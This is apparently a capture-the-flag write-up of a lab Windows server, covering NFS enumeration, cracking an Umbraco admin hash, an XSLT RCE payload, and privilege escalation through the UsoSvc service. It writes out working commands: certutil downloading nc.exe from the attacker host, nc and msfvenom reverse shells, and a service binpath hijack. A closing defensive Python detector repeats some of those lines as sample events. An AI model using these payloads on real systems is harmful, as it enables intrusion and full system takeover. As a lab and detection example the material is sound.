Overview
The target is a Windows server hosting a web site, with ports 21, 80, 445 and 2049 (among others) exposed. We first use the NFS service the target exposes to gather information: a file in the shared directory records what looks like a password hash, which a rainbow-table lookup turns into the plaintext password. The same data shows that the site's CMS is Umbraco; looking up the version reveals an RCE vulnerability, which is used to obtain a reverse shell. From that foothold we find that the account can modify the UsoSvc service, and use that service to obtain a privileged reverse shell.
Information gathering
root@vultr:~# nmap -sV -sC 10.10.10.180
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-26 06:23 UTC
Nmap scan report for 10.10.10.180
Host is up (0.072s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3,4 2049/tcp nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/udp mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100024 1 2049/tcp status
|_ 100024 1 2049/udp status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 3m53s, deviation: 0s, median: 3m53s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-05-26 06:28:48
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.42 seconds
The scan shows that the target runs NFS. Use the NFS client tools to list the exported directories and mount the share locally:
apt install nfs-common
root@vultr:~# showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)
root@vultr:~# mount -t nfs 10.10.10.180:/site_backups /htb
root@vultr:~# ls -l /htb
total 115
drwx------ 2 nobody 4294967294 64 Feb 20 17:16 App_Browsers
drwx------ 2 nobody 4294967294 4096 Feb 20 17:17 App_Data
drwx------ 2 nobody 4294967294 4096 Feb 20 17:16 App_Plugins
drwx------ 2 nobody 4294967294 8192 Feb 20 17:16 Config
-rwx------ 1 nobody 4294967294 89 Nov 1 2018 Global.asax
drwx------ 2 nobody 4294967294 4096 Feb 20 17:16 Media
drwx------ 2 nobody 4294967294 8192 Feb 20 17:16 Umbraco
drwx------ 2 nobody 4294967294 4096 Feb 20 17:16 Umbraco_Client
drwx------ 2 nobody 4294967294 4096 Feb 20 17:16 Views
-rwx------ 1 nobody 4294967294 28539 Feb 20 05:57 Web.config
drwx------ 2 nobody 4294967294 64 Feb 20 17:16 aspnet_client
drwx------ 2 nobody 4294967294 49152 Feb 20 17:16 bin
drwx------ 2 nobody 4294967294 64 Feb 20 17:16 css
-rwx------ 1 nobody 4294967294 152 Nov 1 2018 default.aspx
drwx------ 2 nobody 4294967294 64 Feb 20 17:16 scripts
After looking around, the file Umbraco.sdf under App_Data turns out to contain what looks like the admin account and its password hash:
root@vultr:/htb/App_Data# strings Umbraco.sdf |grep admin
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
From the output above, b8be16afba8c314ad33d812f22a04991b90e2aaa should be a SHA1 hash; a lookup on any online SHA1 cracking site shows the original value is baconandcheese. A quick check shows this is only an application account and cannot be used to log in to the OS directly.
The recovered data tells us the target's CMS is Umbraco. A Google search turns up a PoC for an Umbraco RCE vulnerability; we modify its payload so that it first downloads nc.exe to the target:
payload = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">
<msxsl:script language="C#" implements-prefix="csharp_user">
public string xml()
{ string cmd = "/c certutil -urlcache -split -f http://10.10.14.94/nc.exe c:/windows/temp/nc.exe"; System.Diagnostics.Process proc = new System.Diagnostics.Process();
proc.StartInfo.FileName = "cmd.exe"; proc.StartInfo.Arguments = cmd;
proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true;
proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output;Console.WriteLine(output); }
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="csharp_user:xml()"/>
</xsl:template>
</xsl:stylesheet> """;
Running the PoC, nc is successfully downloaded to the target machine:
root@vultr:~# python3 umb.py
Start
[]
<div id="result"><?xml version="1.0" encoding="utf-16"?>**** Online ****
0000 ...
8eb0
CertUtil: -URLCache command completed successfully.
</div>
End
Next, start an nc listener on port 4444 on the local machine to catch the reverse shell:
nc -lvnp 4444
Then modify the command part of the payload so the target runs nc to start a reverse shell, and run the PoC again:
/c c:/windows/temp/nc.exe 10.10.14.94 4444 -e cmd.exe
We get a reverse shell:
root@vultr:~# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.94] from (UNKNOWN) [10.10.10.180] 49767
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>
Privilege escalation
Gather information on the target host, here using PowerUp.ps1:
c:\Users\Public>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\Public> . ./PowerUp.ps1
. ./PowerUp.ps1
PS C:\Users\Public> invoke-allchecks
invoke-allchecks
[*] Running Invoke-AllChecks
[*] Checking if user is in a local group with administrative privileges...
[*] Checking for unquoted service paths...
[*] Checking service executable and argument permissions...
[*] Checking service permissions...
ServiceName : UsoSvc
Path : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart : True
The output tells us that UsoSvc can be abused: through this service the current account can make UsoSvc load an arbitrary executable, which gives us a path to a reverse shell.
First try Invoke-ServiceAbuse -Name 'UsoSvc' -Command "c:\windows\temp\nc.exe -e cmd.exe 10.10.14.94 2222"
For some reason this does not work, so we fall back to generating a payload with msfvenom:
msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.94 lport=2222 -f exe >re.exe
Start an nc listener on port 2222 locally to catch the reverse shell, upload re.exe to the target host, then on the target change the usosvc configuration and restart the service:
c:\Users\Public>sc config usosvc binpath="c:\windows\temp\re.exe"
sc config usosvc binpath="c:\windows\temp\re.exe"
[SC] ChangeServiceConfig SUCCESS
c:\Users\Public>sc stop usosvc
sc stop usosvc
[SC] ControlService FAILED 1062:
The service has not been started.
c:\Users\Public>sc start usosvc
sc start usosvc
The local listener now receives the reverse shell:
root@vultr:~# nc -lvnp 2222
listening on [any] 2222 ...
connect to [10.10.14.94] from (UNKNOWN) [10.10.10.180] 49779
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>dir c:\users\administrator\desktop
dir c:\users\administrator\desktop
Volume in drive C has no label.
Volume Serial Number is BE23-EB3E
Directory of c:\users\administrator\desktop
02/20/2020 03:41 AM <DIR> .
02/20/2020 03:41 AM <DIR> ..
05/26/2020 12:38 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 19,239,432,192 bytes free
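As an added defensive example (not part of the original writeup), the following Python flags the two host-side traces the chain above leaves behind: certutil used as a downloader, and a service ImagePath rewritten to point into a user-writable directory such as c:\windows\temp. The log lines are constructed to resemble Sysmon Event ID 1 (process creation) and Event ID 13 (registry value set); their field names and layout are an assumption, not a real Sysmon export.

```python
"""Added detection example: spot service ImagePath tampering and certutil downloads."""
import re

# Constructed sample events (not real logs). The first two mirror the writeup:
# certutil fetching nc.exe, then UsoSvc's ImagePath pointed at a temp directory.
# The last two are benign look-alikes that must NOT alert.
SAMPLE_EVENTS = [
    r'EventID=1 Image=C:\Windows\System32\certutil.exe CommandLine="certutil -urlcache -split -f http://10.10.14.94/nc.exe c:/windows/temp/nc.exe"',
    r'EventID=13 TargetObject=HKLM\System\CurrentControlSet\Services\UsoSvc\ImagePath Details=c:\windows\temp\re.exe',
    r'EventID=13 TargetObject=HKLM\System\CurrentControlSet\Services\UsoSvc\ImagePath Details=%systemroot%\system32\svchost.exe -k netsvcs -p',
    r'EventID=1 Image=C:\Windows\System32\certutil.exe CommandLine="certutil -verify cert.cer"',
]

# Matches ...\Services\<name>\ImagePath at the end of a registry path.
SERVICE_KEY = re.compile(r"\\Services\\([^\\]+)\\ImagePath$", re.IGNORECASE)
# Directory segments a low-privileged account can normally write to.
USER_WRITABLE = ("\\temp\\", "\\users\\", "\\programdata\\")


def _fields(line):
    """Parse key=value pairs; values may be double-quoted and contain spaces."""
    return {k: v.strip('"') for k, v in re.findall(r'(\w+)=("[^"]*"|\S+)', line)}


def suspicious_service_image(line):
    """Return (service, path) when a service ImagePath is set to a user-writable location."""
    f = _fields(line)
    if f.get("EventID") != "13":
        return None
    m = SERVICE_KEY.search(f.get("TargetObject", ""))
    if not m:
        return None
    path = f.get("Details", "").lower()
    return (m.group(1), path) if any(seg in path for seg in USER_WRITABLE) else None


def certutil_download(line):
    """Return the URL when certutil is run with -urlcache against a remote URL."""
    f = _fields(line)
    if f.get("EventID") != "1" or "certutil" not in f.get("Image", "").lower():
        return None
    cmd = f.get("CommandLine", "")
    if "-urlcache" not in cmd.lower():
        return None
    m = re.search(r"https?://\S+", cmd)
    return m.group(0) if m else None


def scan(lines):
    """Run both checks over a list of event lines and return alert strings."""
    alerts = []
    for ln in lines:
        hit = suspicious_service_image(ln)
        if hit:
            alerts.append(f"service {hit[0]} ImagePath changed to user-writable path {hit[1]}")
        url = certutil_download(ln)
        if url:
            alerts.append(f"certutil download from {url}")
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

Only the two malicious sample lines produce alerts; the benign certutil -verify call and the original svchost.exe ImagePath pass through.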